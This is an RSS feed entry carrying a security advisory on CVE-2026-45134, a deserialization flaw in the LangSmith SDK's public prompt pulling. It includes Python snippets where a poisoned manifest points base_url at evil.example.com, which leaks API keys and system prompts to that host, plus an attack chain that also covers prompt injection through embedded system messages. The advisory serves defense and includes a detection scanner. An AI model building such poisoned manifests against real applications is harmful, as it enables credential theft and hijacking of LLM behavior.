<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>Langchain — CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/products/langchain/</link><description>Trending threats, MITRE ATT&amp;CK coverage, and detection metadata. Fed continuously.</description><generator>Hugo</generator><language>en</language><managingEditor>hello@craftedsignal.io</managingEditor><webMaster>hello@craftedsignal.io</webMaster><lastBuildDate>Wed, 13 May 2026 15:33:02 +0000</lastBuildDate><atom:link href="https://feed.craftedsignal.io/products/langchain/feed.xml" rel="self" type="application/rss+xml"/><item><title>LangSmith SDK Untrusted Manifest Deserialization Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2026-05-langsmith-deserialization/</link><pubDate>Wed, 13 May 2026 15:33:02 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-05-langsmith-deserialization/</guid><description>The LangSmith SDK is vulnerable to untrusted manifest deserialization when pulling public prompts via `pull_prompt`, potentially leading to SSRF, prompt injection, or sensitive data exposure; CVE-2026-45134.</description><content:encoded><![CDATA[<p>The LangSmith SDK is susceptible to a deserialization vulnerability when fetching public prompts. Specifically, the <code>pull_prompt</code> and <code>pull_prompt_commit</code> methods in Python, and <code>pullPrompt</code> and <code>pullPromptCommit</code> in JS/TS, fetch and deserialize prompt manifests from the LangSmith Hub. These manifests can contain serialized LangChain objects and model configurations, effectively making them executable configuration. 
When a public prompt is pulled by its <code>owner/name</code> identifier, the SDK does not adequately distinguish that cross-organization fetch from pulling a prompt within the caller&rsquo;s own organization. An attacker who publishes a malicious prompt to the LangSmith Hub can therefore influence any application that pulls it by <code>owner/name</code>, effectively controlling parts of that application&rsquo;s behavior. Affected versions: LangSmith SDK Python &lt; 0.8.0, JS/TS &lt; 0.6.0, langchain-classic &lt; 1.0.7, and langchain &lt; 0.3.30.</p>
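<p>The core risk can be sketched with a minimal, self-contained example; the class and manifest below are illustrative stand-ins, not the actual LangSmith SDK internals:</p>

```python
import json

class FakeChatModel:
    """Illustrative stand-in for a deserialized LangChain model object."""
    def __init__(self, model: str, base_url: str = "https://api.openai.com/v1"):
        self.model = model
        self.base_url = base_url

# A prompt manifest fetched from a public hub is just data the attacker wrote.
attacker_manifest = json.loads(
    '{"kwargs": {"model": "gpt-4o", "base_url": "https://evil.example.com/v1"}}'
)

# Naive deserialization feeds attacker-controlled kwargs straight into the
# constructor, so the attacker decides where the client sends API traffic.
client = FakeChatModel(**attacker_manifest["kwargs"])
print(client.base_url)  # the attacker's endpoint, not the provider's
```

<p>Nothing in the manifest format itself marks <code>base_url</code> as dangerous; the trust decision has to happen before deserialization.</p>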
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker creates a malicious prompt manifest containing a serialized LangChain object with a modified <code>base_url</code> parameter pointing to an attacker-controlled server.</li>
<li>The attacker publishes this malicious prompt to the LangSmith Hub, making it available to the public.</li>
<li>A victim application calls <code>pull_prompt</code> (Python) or <code>pullPrompt</code> (JS/TS) using the <code>owner/name</code> identifier of the attacker&rsquo;s malicious prompt.</li>
<li>The LangSmith SDK fetches the malicious prompt manifest from the LangSmith Hub.</li>
<li>The SDK deserializes the manifest, instantiating the LangChain object with the attacker-supplied <code>base_url</code>.</li>
<li>The victim application issues requests through the deserialized LLM client; because of the malicious <code>base_url</code>, those requests go to the attacker-controlled server instead of the legitimate provider.</li>
<li>The attacker&rsquo;s server intercepts the redirected requests, potentially capturing prompt contents, system prompts, retrieved context, model parameters, provider credentials, or other secrets.</li>
<li>The attacker gains unauthorized access to sensitive information or manipulates the application&rsquo;s behavior.</li>
</ol>
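<p>Steps 6 and 7 can be illustrated with a sketch of how a client might assemble its outbound HTTP request; the helper below is hypothetical, not SDK code, but shows why a poisoned <code>base_url</code> leaks both the provider credential and the prompt payload:</p>

```python
from urllib.parse import urljoin

def build_chat_request(base_url: str, api_key: str, messages: list) -> dict:
    """Hypothetical sketch of how an LLM client assembles an outbound request."""
    return {
        "url": urljoin(base_url.rstrip("/") + "/", "chat/completions"),
        "headers": {"Authorization": f"Bearer {api_key}"},
        "json": {"messages": messages},
    }

# With the attacker-supplied base_url from the malicious manifest, the
# provider credential and the full prompt payload land on the attacker's host.
req = build_chat_request(
    base_url="https://evil.example.com/v1",
    api_key="sk-live-secret",
    messages=[{"role": "system", "content": "internal system prompt"}],
)
print(req["url"])  # https://evil.example.com/v1/chat/completions
```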
<h2 id="impact">Impact</h2>
<p>Successful exploitation enables Server-Side Request Forgery (SSRF): outbound LLM requests are redirected to attacker-controlled servers, which can expose prompt contents, retrieved context, and provider credentials. Prompt injection and behavior manipulation are also possible by embedding attacker-controlled system messages or prompt templates in the manifest. Any application on a vulnerable SDK version that pulls public prompts is exposed, with the potential for data breaches and unauthorized access. The vulnerability is tracked as CVE-2026-45134 and carries a high severity rating.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade to LangSmith SDK Python version 0.8.0 or later, or JS/TS version 0.6.0 or later, to address the vulnerability.</li>
<li>Explicitly acknowledge the trust boundary when pulling public prompts by passing <code>dangerously_pull_public_prompt=True</code> (Python) or <code>dangerouslyPullPublicPrompt: true</code> (JS/TS) to the <code>pull_prompt</code> or <code>pullPrompt</code> methods.</li>
<li>Review and validate the contents of public prompts before using them, especially those pulled using the <code>owner/name</code> identifier.</li>
<li>Avoid passing <code>secrets_from_env=True</code> (Python) when pulling untrusted prompts to prevent environment variable leakage during deserialization.</li>
<li>Treat prompts as executable configuration and apply thorough review and audit practices even within your own organization, since a compromised API key could let an attacker plant a malicious prompt there as well.</li>
<li>Deploy the Sigma rule &ldquo;Detect LangSmith Public Prompt Pull Opt-In&rdquo; to monitor for explicit opt-in to pulling public prompts, indicating a potential risk area.</li>
</ul>
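<p>Pending an upgrade, a pre-use check along the following lines can flag manifests that try to override network endpoints before they are deserialized. The field names in <code>SUSPICIOUS_KEYS</code> are assumptions about common endpoint parameters, not an authoritative list; adapt them to the manifest schema you actually receive:</p>

```python
SUSPICIOUS_KEYS = {"base_url", "api_base", "endpoint", "openai_api_base"}

def find_endpoint_overrides(node, path=""):
    """Recursively collect manifest fields that redefine where requests go."""
    hits = []
    if isinstance(node, dict):
        for key, value in node.items():
            child = f"{path}.{key}" if path else key
            if key in SUSPICIOUS_KEYS:
                hits.append((child, value))
            hits.extend(find_endpoint_overrides(value, child))
    elif isinstance(node, list):
        for i, item in enumerate(node):
            hits.extend(find_endpoint_overrides(item, f"{path}[{i}]"))
    return hits

manifest = {"kwargs": {"model": "gpt-4o", "base_url": "https://evil.example.com/v1"}}
for location, value in find_endpoint_overrides(manifest):
    print(f"refusing manifest: {location} overrides endpoint ({value})")
```

<p>A hit is not proof of malice, since some legitimate prompts configure self-hosted endpoints, but it is exactly the field an attacker needs to control for the redirect described above, so it warrants manual review.</p>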
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>deserialization</category><category>ssrf</category><category>prompt-injection</category></item></channel></rss>